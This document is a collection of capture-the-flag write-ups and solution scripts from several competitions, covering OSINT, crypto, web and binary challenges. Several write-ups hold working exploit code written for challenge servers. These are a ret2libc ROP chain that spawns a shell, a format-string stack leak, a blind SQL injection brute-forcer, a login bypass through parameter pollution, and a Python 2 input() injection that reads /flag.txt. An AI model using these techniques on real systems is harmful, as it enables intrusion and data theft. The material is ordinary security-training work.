-------------------------------------------------------------------------------- 1 | # AHF - OSINT 2 | 3 | Author - [Sanjay Baskaran](http://github.com/sanjaybaskaran01) 4 | 5 | Requirements : Know how to Google 6 | 7 | 8 | --- 9 | When we open the challenge we are greeted with 10 | 11 | >We've been listening and we've heard this group can write decent code (ahem ahem),but what have they been listening to? 12 | 13 | 14 | The [PDF](./team.pdf) included pictures of the team "Atom Heart Father" and their names. 15 | 16 | 17 | We first start up by checking all the user's Spotify (Maybe the flag was in the user's playlist's description) / GitHub (Maybe a project that the team had developed) but that led nowhere. 18 | 19 | Finally trying on Youtube gives us Atom Heart Mother as a suggestion which could be a song that they were listening to. 20 | 21 |

22 | 1 23 |

24 | 25 | 26 |

27 | 2 28 |

29 | 30 | and finally in the comments of [Pink Floyd - Atom Heart Mother Suite (Full Song)](https://www.youtube.com/watch?v=Fku7hi5kI-c) we have 31 |

32 | flag 33 |

34 | 35 | The flag is 36 | 37 | ``` 38 | dsc{d0nt_m355_w1th_4t0m_h34rt_f4th3r} 39 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/OSINT/AHF/flag.png -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/AHF/team.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/OSINT/AHF/team.pdf -------------------------------------------------------------------------------- /Deconstruct.f/OSINT/Dora the Explorer/README.md: -------------------------------------------------------------------------------- 1 | # Dora the explorer - OSINT 2 | 3 | Author - [BlackJack](http://github.com/Mannan-Goyal) 4 | 5 | Requirements : Know how to google, exiftool, XOR 6 | 7 | * * * 8 | 9 | When we start to solve the challenge we are faced with a pretty elaborate hint which says - 10 | 11 | > Hi, I am Dora the Explorer and I love exploring as you know ;) (after all 1+1=0), and I recently found this place which has an a very cool looking street art to it. Plus they posted about it on social media many a times. You all should see this too sometime!!! 12 | 13 | #### Also, we are provided with the following image - 14 | 15 |

Chall Image

16 | 17 | 18 | #### If you carefully look at the picture you'll see this - 19 |

Challenge_Zommed_In

20 | 21 | - After seeing this my first instinct was to google social street. Among the many results I found this [instagram page](https://www.instagram.com/thesocialstreet_/?hl=en). 22 | 23 | - After scrolling through a bit I realised that there was no street art or anything related to it, so I searched for social street on instagram search. The first result to come up was [this](https://www.instagram.com/socialstreetcafe/?hl=en). 24 | 25 | - Scrolling a bit lead me to this [post.](https://www.instagram.com/p/CKGRq81l5bv/) This seemed like street art also. 26 | 27 | - Upon opening this I found the comment by [@thevisheshbansal](https://www.instagram.com/thevisheshbansal/) saying 28 | 29 | > I know you came a long way to find this. Here is a flag for you: 30 | ``` 31 | j}mu?c:i=}Qf?j=Q:b>zQ}>Ql=Qm:|=h{?s 32 | ``` 33 | 34 | - Well the challenge is still not over, we need to decrypt the flag. During the ctf I visited [cyberchef](https://gchq.github.io/CyberChef/) put the flag as input and used the `magic mode` with `intensive setting` turned on cause I wanted to finish the chall fast. 35 | 36 | ![Magic_Decode](https://imgur.com/sYAqLzd.png) 37 | 38 | - But from the hint `(1+1=0)` given in the challenge we could figure out that we might have to use XOR. 39 | 40 | - And in the comment it was mentioned the key to unlock the flag is the device manufacturer of the image given initially. 41 | 42 | - So running exiftool.... 43 | 44 |

exiftool

45 | 46 | - Hence trying out XOR with key `OnePlus` 47 | ![XOR](https://imgur.com/CjuFOZG.png) 48 | 49 | - So finally the flag is 50 | `dsc{1m4g3s_h1d3_4l0t_s0_b3_c4r3fu1}` 51 | 52 | -------------------------------------------------------------------------------- /Deconstruct.f/README.md: -------------------------------------------------------------------------------- 1 | # Deconstruct.f 2 | 3 | - Official URL: https://ctf.dscvit.com/ 4 | - Format: Jeopardy 5 | - Duration: Fri, 01 Oct. 2021, 13:37 IST — Sat, 02 Oct. 2021, 13:37 IST 6 | -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/Package.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/pwn/Reject humanity return to libc/Package.tar -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/pwn/Reject humanity return to libc/challenge -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/dispenser_login.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void disarm_dispenser(){ 5 | char password[256]; 6 | FILE *password_file; 7 | password_file = fopen("password.txt","r"); 8 | fgets(password,sizeof(*password_file),password_file); 9 | printf("Enter password to disable dispenser:\n"); 10 | char user_input[256]; 11 | gets(user_input); 12 | int eq = strncmp(user_input,password,256); 13 | if (eq != 0) { 14 | printf("Incorrect password\n"); 15 | } 16 | else { 17 | printf("Password correct\n"); 18 | printf("Disarming dispenser (or not lol)...\n"); 19 | } 20 | 21 | } 22 | 23 | int main() { 24 | disarm_dispenser(); 25 | } 26 | -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/lib/x86_64-linux-gnu/libc-2.31.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/Deconstruct.f/pwn/Reject humanity return to libc/lib/x86_64-linux-gnu/libc-2.31.so -------------------------------------------------------------------------------- /Deconstruct.f/pwn/Reject humanity return to libc/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | local = False 4 | 5 | host = 'overly.uniquename.xyz' 6 | port = 2052 7 | 8 | elf = ELF('./challenge') 9 | rop = ROP(elf) 10 | 11 | if local: 12 | p = elf.process() 13 | libc = ELF('/usr/lib/libc.so.6') 14 | else: 15 | p = remote(host, port) 16 | libc = ELF('./lib/x86_64-linux-gnu/libc-2.31.so') 17 | 18 | PUTS_PLT = elf.plt['puts'] 19 | MAIN_PLT = elf.symbols['main'] 20 | 21 | POP_RDI = rop.find_gadget(['pop rdi', 'ret'])[0] 22 | RET = rop.find_gadget(['ret'])[0] 23 | 24 | OFFSET = b'A' * (0x210 + 0x8) 25 | 26 | log.info("puts@plt: " + hex(PUTS_PLT)) 27 | log.info("main@plt: " + hex(MAIN_PLT)) 28 | log.info("POP RDI: " + hex(POP_RDI)) 29 | 30 | def get_addr(func_name): 31 | FUNC_GOT = elf.got[func_name] 32 | rop_chain = [ 33 | POP_RDI, FUNC_GOT, 34 | PUTS_PLT, 35 | MAIN_PLT, 36 | ] 37 | 38 | rop_chain = b''.join([p64(i) for i in rop_chain]) 39 | payload = OFFSET + rop_chain 40 | 41 | print(p.recvuntil('Enter password to disable dispenser:\n')) 42 | print(payload) 43 | 44 | p.sendline(payload) 45 | 46 | received = p.recvline().strip() 47 | print(received) 48 | print(p.recvline()) 49 | received = p.recvline().strip() 50 | print(received) 51 | leak = u64(received.ljust(8, b'\x00')) 52 | libc.address = leak - libc.symbols[func_name] 53 | 54 | return hex(leak) 55 | x = get_addr('__libc_start_main') 56 | log.info("libcstart main " + x) 57 | log.info('Libc base: ' + hex(libc.address)) 58 | 59 | BIN_SH = next(libc.search(b'/bin/sh')) 60 | SYSTEM = libc.symbols['system'] 61 | EXIT = libc.symbols['exit'] 62 | 63 | ROP_CHAIN = [ 64 | RET, 65 | POP_RDI, BIN_SH, 66 | SYSTEM, 67 | EXIT, 68 | ] 69 | 70 | ROP_CHAIN = b''.join([p64(i) for i in ROP_CHAIN]) 71 | 72 | payload = OFFSET + ROP_CHAIN 73 | 74 | print(p.recvuntil('Enter password to disable dispenser:\n')) 75 | 76 | p.sendline(payload) 77 | 78 | p.interactive() -------------------------------------------------------------------------------- /Deconstruct.f/pwn/destructinator/README.md: -------------------------------------------------------------------------------- 1 | # Destructinator 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Exploit 6 | 7 | In this challenge, there is a format string vulnerability, since the `printf()` function directly accepts user input. The user can enter strings like `%s`, `%x`, `%p`, to leak items from the stack. 8 | 9 | The password was stored as a local variable in the function, therefore it must be present on the stack. We run the following script to leak the stack. 10 | 11 | ```py 12 | from pwn import * 13 | host = 'overly.uniquename.xyz' 14 | port = 8880 15 | 16 | stack = [] 17 | 18 | for i in range(1, 100): 19 | try: 20 | p = remote(host, port) 21 | print(p.recv(1024)) 22 | p.sendline('%{}$s'.format(i)) 23 | print(p.recvline()) 24 | y = p.recvline() 25 | 26 | stack.append(y) 27 | print(y) 28 | print(stack) 29 | except: 30 | pass 31 | ``` 32 | 33 | This gives an output like the following 34 | 35 | ```py 36 | [b'(null)\n', b'\xd6.y\xe4\xfd\x7f\n', b'(null)\n', b'I\x89\xc0H\x85\xc0\x0f\x84\xc2\n', b'%11$s\n', b'1_l0v3_c4ts\n', b'H\x8d\x05\x88\xf4\x02\n', b'(null)\n', b'I\x83\xc5\x02A\x0f\xb7m\xfeI\x89\xc6L\x8dx\xfeM\x85\xe4u\x13\xeb\xcc\x0f\x1f@\n', b'(null)\n', b'\n', b'(null)\n', b'1_l0v3_c4ts\n', b'\n', b'\x85\xc0y\xe5H\xc7\xc0\xc0\xff\xff\xffH\x8bs\x08H\x8d\rb\xcf\x02\n'...] 37 | ``` 38 | 39 | We can see the string `1_l0v3_c4ts` in the array above, which is actually the password for the challenge. Entering this returns the flag: 40 | 41 | ``` 42 | dsc{7h3_p20ff3502_7h4nk5_y0u} 43 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/web/Curly Fries 1/README.md: -------------------------------------------------------------------------------- 1 | # Curly Fries 1 - Web 2 | 3 | Author - [UnknownAbyss](https://github.com/UnknownAbyss) 4 | 5 | Requirements : cURL 6 | 7 | * * * 8 | 9 | The challenge gives us the following text - 10 | 11 | > Normal fries are nice, but everything's better with a curl in it. The flag is right in front of you. 12 | 13 | 14 | ``` 15 | very.uniquename.xyz:8880 16 | ``` 17 | 18 | #### Upon opening the link we see - 19 | 20 |

Chall Image

21 | 22 | This screams sweden. So we try to set the language headers to swedish 23 | 24 | ```sh 25 | curl -H "Accept-Language: sv-SE" very.uniquename.xyz:8880 26 | ``` 27 | 28 | This gives us the flag... 29 | ``` 30 | dsc{1_l0v3_sw3d3n} 31 | ``` 32 | -------------------------------------------------------------------------------- /Deconstruct.f/web/Curly Fries 2/README.md: -------------------------------------------------------------------------------- 1 | # Curly Fries 2 - Web 2 | 3 | Author - [UnknownAbyss](https://github.com/UnknownAbyss) 4 | 5 | Requirements : cURL 6 | 7 | * * * 8 | 9 | The challenge gives us the following text - 10 | 11 | > Normal fries are nice, but everything's better with a curl in it. Why do logos make things so recognizable? 12 | 13 | 14 | ``` 15 | very.uniquename.xyz:2052 16 | ``` 17 | 18 | #### Upon opening the link we see - 19 | 20 |

Chall Image

21 | 22 | We see the logo of xbox and linux on the screen. This is me accessing this page on a windows device 23 | 24 | Putting User-Agent as Linux... 25 | 26 | ```sh 27 | curl -H "User-Agent: Linux" very.uniquename.xyz:2052 28 | ``` 29 | 30 | ...we get this back 31 | 32 | ```html 33 | ... 34 | 35 |
Xbox
36 | 37 | ... 38 | ``` 39 | 40 | We see the linux logo is gone. Hence we put user agent as both Linux and Xbox 41 | 42 | ```sh 43 | curl -H "User-Agent: Linux Xbox" very.uniquename.xyz:2052 44 | ``` 45 | 46 | This gives us the flag inside the body of the page... 47 | ``` 48 | dsc{1m4g1n3_l1nux_0n_4n_xb0x} 49 | ``` 50 | -------------------------------------------------------------------------------- /Deconstruct.f/web/Hungry Man/README.md: -------------------------------------------------------------------------------- 1 | # Hungry Man - Web 2 | 3 | Author - [UnknownAbyss](https://github.com/UnknownAbyss) 4 | 5 | Requirements : Python, cURL 6 | 7 | * * * 8 | 9 | The challenge gives us the following text - 10 | 11 | > There is nothing here I promise! ;) 12 | 13 | 14 | ``` 15 | very.uniquename.xyz:2095 16 | ``` 17 | 18 | #### Upon opening the link we see - 19 | 20 |

Chall Image

21 | 22 | 23 | Checking the network tab, we find the following response header 24 | 25 |

Chall Image

26 | 27 | We send the following curl request setting the cookie to the given string 28 | 29 | ```sh 30 | curl -H "Cookie: flag=c29tZXRpbWVzIHRoZSBrZXkgdG8gdW5sb2NraW5nIHRoZSBhbnN3ZXIgaXMgdGhlIHF1ZXN0aW9uIGl0c2VsZi4uLiBidXQgbXkgZmF2b3JpdGUgaXMgY2hvY28gY2hpcA==" very.uniquename.xyz:2095 31 | ``` 32 | 33 | The repsonse is... 34 | 35 | ``` 36 | {"flag":"522748524ad010358705b6852b81be4c"} 37 | ``` 38 | 39 | Then sending this new cookie... 40 | 41 | ```sh 42 | curl -H "Cookie: flag=522748524ad010358705b6852b81be4c" very.uniquename.xyz:2095 43 | ``` 44 | 45 | The repsonse is... 46 | 47 | ``` 48 | {"flag":"70e9490b5d5a217070c1e7df9518e9d5"} 49 | ``` 50 | 51 | Let us write a script for this... 52 | 53 | ```py 54 | import requests 55 | 56 | 57 | url = 'http://very.uniquename.xyz:2095' 58 | flags = ['c29tZXRpbWVzIHRoZSBrZXkgdG8gdW5sb2NraW5nIHRoZSBhbnN3ZXIgaXMgdGhlIHF1ZXN0aW9uIGl0c2VsZi4uLiBidXQgbXkgZmF2b3JpdGUgaXMgY2hvY28gY2hpcA=='] 59 | 60 | 61 | while (flags[-1]!='EOF'): 62 | x = requests.get(url, cookies={'flag': flags[-1]}).text 63 | flags.append(x[9:-3 ]) 64 | 65 | for i in flags[1:-1]: 66 | print(i) 67 | ``` 68 | 69 | This gives us the following output 70 | 71 | ``` 72 | 522748524ad010358705b6852b81be4c 73 | 70e9490b5d5a217070c1e7df9518e9d5 74 | 60173ca988f93d0a7da64f3327ad336c 75 | 45ec864b6976a208c6af1a37e2c61c3a 76 | 046bf0a7d0d641c527765a02816eca9f 77 | 24cafc74b88dfafb0524ecc85a76f8bd 78 | f3ea97d2cd1f5619f570c06a10a041b5 79 | fa4f4d80f554c6845daf73511d75e6bc 80 | 72e6f6e0f08ca88f02b1480464afd55b 81 | 97d243cd9c2513d20fff6d5677b2b62b 82 | ffc987113c7a22fb2a52b6f9842f79be 83 | a61c8204ca3eb98c9da7344cf0fba066 84 | 9bea76c2f9cb9140f837ee4518b6749c 85 | ``` 86 | 87 | This appears to be an MD5 hash. We decode these and find the following string 88 | 89 | ``` 90 | ds 91 | c{ 92 | 91v 93 | 3_m 94 | 3_4 95 | _h 96 | 4n 97 | dfu 98 | 1_0 99 | f_ 100 | c00 101 | k13 102 | 5} 103 | ``` 104 | 105 | This is the flag... 106 | ``` 107 | dsc{91v3_m3_4_h4ndfu1_0f_c00k135} 108 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/web/Hungry Man/hungry.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | url = 'http://very.uniquename.xyz:2095' 5 | flags = ['c29tZXRpbWVzIHRoZSBrZXkgdG8gdW5sb2NraW5nIHRoZSBhbnN3ZXIgaXMgdGhlIHF1ZXN0aW9uIGl0c2VsZi4uLiBidXQgbXkgZmF2b3JpdGUgaXMgY2hvY28gY2hpcA=='] 6 | 7 | 8 | while (flags[-1]!='EOF'): 9 | x = requests.get(url, cookies={'flag': flags[-1]}).text 10 | flags.append(x[9:-3 ]) 11 | 12 | for i in flags[1:-1]: 13 | print(i) -------------------------------------------------------------------------------- /Deconstruct.f/web/gate keeper/README.md: -------------------------------------------------------------------------------- 1 | # Gate Keeper 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Exploit 6 | 7 | SQL Injection. This also works for the [Taxi Union](../taxi%20union) challenge. 8 | 9 | ```py 10 | import requests 11 | import string 12 | 13 | flag = '' 14 | 15 | print(flag) 16 | 17 | domain = string.ascii_lowercase + string.ascii_uppercase + string.digits + '_}' 18 | 19 | f = 0 20 | 21 | challenge = "gate keeper" 22 | url = "" 23 | check = "" 24 | key = "" 25 | column = "" 26 | if challenge == "taxi union": 27 | url = 'http://extremely.uniquename.xyz:2052/' 28 | check = "TN-06-AP-9879" 29 | key = 'lisence_plate' 30 | column = "location" 31 | elif challenge == 'gate keeper': 32 | url = 'http://extremely.uniquename.xyz:2082/' 33 | check = "The flag for the CTF is the password you entered.(If you havent cheated that is)" 34 | key = 'password' 35 | column = "password" 36 | 37 | print("URL", url) 38 | 39 | while True: 40 | for char in domain: 41 | payload = "' or {} like '{}%'; --".format(column, flag + char) 42 | print(payload) 43 | 44 | r = requests.post(url, data={key: payload}) 45 | 46 | if (check in r.text): 47 | flag = flag + char 48 | print("Success " + flag) 49 | 50 | break 51 | ``` -------------------------------------------------------------------------------- /Deconstruct.f/web/taxi union/README.md: -------------------------------------------------------------------------------- 1 | # Taxi Union 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | ## Exploit 6 | 7 | SQL Injection. This solution also works for the [Gate Keeper](../gate%20keeper) challenge. 8 | 9 | ```py 10 | import requests 11 | import string 12 | 13 | flag = '' 14 | 15 | print(flag) 16 | 17 | domain = string.ascii_lowercase + string.ascii_uppercase + string.digits + '_}' 18 | 19 | f = 0 20 | 21 | challenge = "gate keeper" 22 | url = "" 23 | check = "" 24 | key = "" 25 | column = "" 26 | if challenge == "taxi union": 27 | url = 'http://extremely.uniquename.xyz:2052/' 28 | check = "TN-06-AP-9879" 29 | key = 'lisence_plate' 30 | column = "location" 31 | elif challenge == 'gate keeper': 32 | url = 'http://extremely.uniquename.xyz:2082/' 33 | check = "The flag for the CTF is the password you entered.(If you havent cheated that is)" 34 | key = 'password' 35 | column = "password" 36 | 37 | print("URL", url) 38 | 39 | while True: 40 | for char in domain: 41 | payload = "' or {} like '{}%'; --".format(column, flag + char) 42 | print(payload) 43 | 44 | r = requests.post(url, data={key: payload}) 45 | 46 | if (check in r.text): 47 | flag = flag + char 48 | print("Success " + flag) 49 | 50 | break 51 | ``` -------------------------------------------------------------------------------- /Fword CTF/Miscellaneous/Secret Array/README.md: -------------------------------------------------------------------------------- 1 | # Secret Array 2 | 3 | Author: [roerohan](https://github.com/roerohan) and [namsnath](https://github.com/namsnath) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | - nc secretarray.fword.wtf 1337 12 | 13 | # Exploitation 14 | 15 | We can get the sum of 2 numbers, 1337 times. We can send out 3 queries and find out 3 values. 16 | 17 | ``` 18 | 1 2 19 | 1 3 20 | 2 3 21 | ``` 22 | 23 | From here we can get the individual values of a[1], a[2], and a[3]. 24 | 25 | 26 | ```py 27 | from pwn import remote 28 | 29 | r = remote('secretarray.fword.wtf', 1337) 30 | 31 | x = r.recvuntil('START:\n').decode() 32 | print(x) 33 | 34 | arr = [] 35 | 36 | for k in range(0, 1335, 3): 37 | x = f'{k} {k+1}' 38 | print(x) 39 | x = r.sendline(x) 40 | a = int(r.recvline().decode()) 41 | print(a) 42 | 43 | x = f'{k+1} {k+2}' 44 | print(x) 45 | x = r.sendline(x) 46 | b = int(r.recvline().decode()) 47 | print(b) 48 | 49 | x = f'{k} {k+2}' 50 | print(x) 51 | x = r.sendline(x) 52 | c = int(r.recvline().decode()) 53 | print(c) 54 | 55 | first = (a - b + c)//2 56 | second = a - first 57 | third = b - second 58 | 59 | arr.append(first) 60 | arr.append(second) 61 | arr.append(third) 62 | 63 | x = f'{1334} {1335}' 64 | r.sendline(x) 65 | x = int(r.recvline().decode()) 66 | first = x - arr[1334] 67 | arr.append(first) 68 | 69 | x = f'{1334} {1336}' 70 | r.sendline(x) 71 | x = int(r.recvline().decode()) 72 | first = x - arr[1334] 73 | arr.append(first) 74 | 75 | print(arr) 76 | 77 | r.sendline('DONE {}'.format(' '.join(map(str, arr)))) 78 | x = r.recvline().decode() 79 | 80 | print(x) 81 | ``` 82 | 83 | The flag is: 84 | 85 | ``` 86 | FwordCTF{R4nd0m_isnT_R4nd0m_4ft3r_4LL_!_Everyhthing_is_predict4bl3_1f_y0u_kn0w_wh4t_Y0u_d01nGGGG} 87 | ``` -------------------------------------------------------------------------------- /Fword CTF/README.md: -------------------------------------------------------------------------------- 1 | # Fword CTF 2 | 3 | - Official URL: https://ctf.fword.wtf/ 4 | - Format: Jeopardy 5 | - Duration: Sat, 29 Aug. 2020, 22:30 IST — Sun, 30 Aug. 2020, 22:30 IST 6 | -------------------------------------------------------------------------------- /Google CTF/README.md: -------------------------------------------------------------------------------- 1 | # Google Capture the Flag 2020 2 | 3 | - Official URL: https://g.co/ctf 4 | - Format: Jeopardy 5 | - Duration: Sat, 22 Aug. 2020, 05:30 IST — Mon, 24 Aug. 2020, 05:29 IST -------------------------------------------------------------------------------- /Google CTF/Web/Log-Me-In/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | url = lambda path: 'https://log-me-in.web.ctfcompetition.com' + path 5 | 6 | s = requests.Session() 7 | 8 | payload = { 9 | "username": "michelle", 10 | "password[username]": "michelle", 11 | "csrf": "", 12 | } 13 | 14 | r = s.post(url('/login'), data=payload) 15 | 16 | r = s.get(url('/flag')) 17 | 18 | if re.search(r'CTF{.*}', r.text): 19 | print(r.text) 20 | -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/boredom: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HSCTF 7/Binary Exploitation/boredom/boredom -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/boredom.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void setup() { 9 | puts("I'm currently bored out of my mind. Give me something to do!"); 10 | setvbuf(stdin, NULL, _IONBF, NULL); 11 | setvbuf(stdout, NULL, _IONBF, NULL); 12 | } 13 | 14 | void flag() { 15 | FILE *f = fopen("flag.txt", "r"); 16 | char buf[50]; 17 | if (f == NULL) { 18 | puts("You're running this locally or I can't access the flag file for some reason."); 19 | puts("If this occurs on the remote, ping @PMP#5728 on discord server."); 20 | exit(1); 21 | } 22 | fgets(buf, 50, f); 23 | printf("Hey, that's a neat idea. Here's a flag for your trouble: %s\n", 24 | buf); 25 | puts("Now go away."); 26 | exit(42); 27 | } 28 | 29 | int main() { 30 | char toDo[200]; 31 | setup(); 32 | 33 | printf("Give me something to do: "); 34 | gets(toDo); 35 | puts("Ehhhhh, maybe later."); 36 | return 0; 37 | } 38 | -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/static/img1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HSCTF 7/Binary Exploitation/boredom/static/img1.png -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/static/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HSCTF 7/Binary Exploitation/boredom/static/img2.png -------------------------------------------------------------------------------- /HSCTF 7/Binary Exploitation/boredom/static/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/csivitu/CTF-Write-ups/875308b9ecab6847c44dbfa3e4ab8d9fccaad50d/HSCTF 7/Binary Exploitation/boredom/static/img3.png -------------------------------------------------------------------------------- /HSCTF 7/Miscellaneous/My First Calculator/README.md: -------------------------------------------------------------------------------- 1 | # My First Calculator 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | Exploit a python 2 vulnerability. 6 | 7 | # Requirements 8 | 9 | - Python 2 10 | 11 | # Source 12 | 13 | - [calculator.py](./calculator.py) 14 | 15 | ``` 16 | I'm really new to python. Please don't break my calculator! 17 | 18 | nc misc.hsctf.com 7001 19 | 20 | There is a flag.txt on the server. 21 | 22 | Author: meow 23 | ``` 24 | 25 | ```python 26 | #!/usr/bin/env python2.7 27 | 28 | try: 29 | print("Welcome to my calculator!") 30 | print("You can add, subtract, multiply and divide some numbers") 31 | 32 | print("") 33 | 34 | first = int(input("First number: ")) 35 | second = int(input("Second number: ")) 36 | 37 | operation = str(raw_input("Operation (+ - * /): ")) 38 | 39 | if first != 1 or second != 1: 40 | print("") 41 | print("Sorry, only the number 1 is supported") 42 | 43 | if first == 1 and second == 1 and operation == "+": 44 | print("1 + 1 = 2") 45 | if first == 1 and second == 1 and operation == "-": 46 | print("1 - 1 = 0") 47 | if first == 1 and second == 1 and operation == "*": 48 | print("1 * 1 = 1") 49 | if first == 1 and second == 1 and operation == "/": 50 | print("1 / 1 = 1") 51 | else: 52 | print(first + second) 53 | except ValueError: 54 | pass 55 | 56 | ``` 57 | 58 | # Exploitation 59 | 60 | The code for the `calculator.py` file uses `input()` in python 2. The `input()` function in python 2 is vulnerable, since it does not stringify the input, instead takes it as it is. For example, if you were to pass `__import__('os')`, it would be executed. So, here's the payload: 61 | 62 | ```bash 63 | Welcome to my calculator! 64 | You can add, subtract, multiply and divide some numbers 65 | 66 | First number: __import__('os').system('cat /flag.txt') 67 | flag{please_use_python3} 68 | ``` 69 | 70 | You can search around in the directories to find the flag using `ls`, etc. The flag is eventually found in the `/` directory. The flag is: 71 | 72 | ``` 73 | flag{please_use_python3} 74 | ``` -------------------------------------------------------------------------------- /HSCTF 7/Miscellaneous/My First Calculator/calculator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | 3 | try: 4 | print("Welcome to my calculator!") 5 | print("You can add, subtract, multiply and divide some numbers") 6 | 7 | print("") 8 | 9 | first = int(input("First number: ")) 10 | second = int(input("Second number: ")) 11 | 12 | operation = str(raw_input("Operation (+ - * /): ")) 13 | 14 | if first != 1 or second != 1: 15 | print("") 16 | print("Sorry, only the number 1 is supported") 17 | 18 | if first == 1 and second == 1 and operation == "+": 19 | print("1 + 1 = 2") 20 | if first == 1 and second == 1 and operation == "-": 21 | print("1 - 1 = 0") 22 | if first == 1 and second == 1 and operation == "*": 23 | print("1 * 1 = 1") 24 | if first == 1 and second == 1 and operation == "/": 25 | print("1 / 1 = 1") 26 | else: 27 | print(first + second) 28 | except ValueError: 29 | pass 30 | -------------------------------------------------------------------------------- /HSCTF 7/README.md: -------------------------------------------------------------------------------- 1 | # HSCTF 7 2 | 3 | - Official URL: https://ctf.hsctf.com/ 4 | - Format: Jeopardy 5 | - Duration: Mon, 01 June 2020, 17:30 IST — Sat, 06 June 2020, 05:30 IST 6 | -------------------------------------------------------------------------------- /HacktivityCon CTF/Cryptography/Tyrannosaurus Rex/README.md: -------------------------------------------------------------------------------- 1 | # Tyrannosaurus Rex 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - Python 8 | 9 | # Source 10 | 11 | ```python 12 | #!/usr/bin/env python 13 | 14 | import base64 15 | import binascii 16 | 17 | h = binascii.hexlify 18 | b = base64.b64encode 19 | 20 | c = b'37151032694744553d12220a0f584315517477520e2b3c226b5b1e150f5549120e5540230202360f0d20220a376c0067' 21 | 22 | def enc(f): 23 | e = b(f) 24 | 25 | print(e) 26 | z = [] 27 | i = 0 28 | while i < len(e): 29 | z += [ e[i] ^ e[((i + 1) % len(e))]] 30 | i = i + 1 31 | print(z) 32 | print(bytearray(z)) 33 | c = h(bytearray(z)) 34 | return c 35 | ``` 36 | 37 | ``` 38 | We found this fossil. Can you reverse time and bring this back to life? 39 | ``` 40 | 41 | # Exploitation 42 | 43 | In this challenge, you have to reverse the steps to get back the original flag from the ciphertext `c`. Make a function `dec(x)` which takes in the ciphertexts and spits out the original text. 44 | 45 | ```python 46 | #!/usr/bin/env python 47 | 48 | import base64 49 | import binascii 50 | 51 | h = binascii.hexlify 52 | b = base64.b64encode 53 | 54 | c = b'37151032694744553d12220a0f584315517477520e2b3c226b5b1e150f5549120e5540230202360f0d20220a376c0067' 55 | 56 | def enc(f): 57 | e = b(f) 58 | 59 | print(e) 60 | z = [] 61 | i = 0 62 | while i < len(e): 63 | z += [ e[i] ^ e[((i + 1) % len(e))]] 64 | i = i + 1 65 | print(z) 66 | print(bytearray(z)) 67 | c = h(bytearray(z)) 68 | return c 69 | 70 | def dec(x): 71 | x = list(bytes.fromhex(x.decode())) 72 | z = ord('Z') 73 | for i in range(len(x)): 74 | print(chr(z), end='') 75 | z = x[i] ^ z 76 | dec(c) 77 | ``` 78 | 79 | Now, just run this with python, and pipe the output to `base64 -d`. 80 | 81 | ```bash 82 | $ python fossil | base64 -d 83 | flag{tyrannosauras_xor_in_reverse} 84 | ``` 85 | 86 | The flag is: 87 | ``` 88 | flag{tyrannosauras_xor_in_reverse} 89 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Mobile/Mobile One/README.md: -------------------------------------------------------------------------------- 1 | # Mobile One 2 | 3 | Author: [roerohan](https://github.com/roerohan) 4 | 5 | # Requirements 6 | 7 | - strings 8 | 9 | # Source 10 | 11 | ``` 12 | The one true mobile app. 13 | ``` 14 | 15 | - [mobile_one.apk](./mobile_one.apk) 16 | 17 | # Exploitation 18 | 19 | Download the apk. Run strings on it. That's it. 20 | 21 | ```bash 22 | $ strings mobile_one.apk | grep flag 23 | ##flag{strings_grep_and_more_strings} 24 | flag 25 | ``` 26 | 27 | The flag is: 28 | ``` 29 | flag{strings_grep_and_more_strings} 30 | ``` -------------------------------------------------------------------------------- /HacktivityCon CTF/Mobile/Mobile One/mobile_one.apk: -------------------------------------------------------------------------------- 